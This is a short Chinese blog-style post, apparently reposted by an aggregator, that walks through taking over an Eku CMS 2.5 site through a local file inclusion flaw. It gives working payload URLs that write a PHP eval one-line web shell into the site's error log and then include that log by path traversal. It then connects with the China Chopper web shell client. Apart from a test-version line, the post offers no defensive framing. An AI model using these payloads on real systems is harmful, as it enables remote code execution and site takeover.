易酷cms本地包含漏洞拿shell
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了易酷cms本地包含漏洞拿shell相关的知识,希望对你有一定的参考价值。
测试版本:易酷cms2.5
包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}
会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日
错误日志内容
包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/\\..\\temp\\logs\\17_12_02.log
直接用菜刀连接
连接成功
以上是关于易酷cms本地包含漏洞拿shell的主要内容,如果未能解决你的问题,请参考以下文章
极致CMS两处漏洞复现/存储xss/文件上传Getshell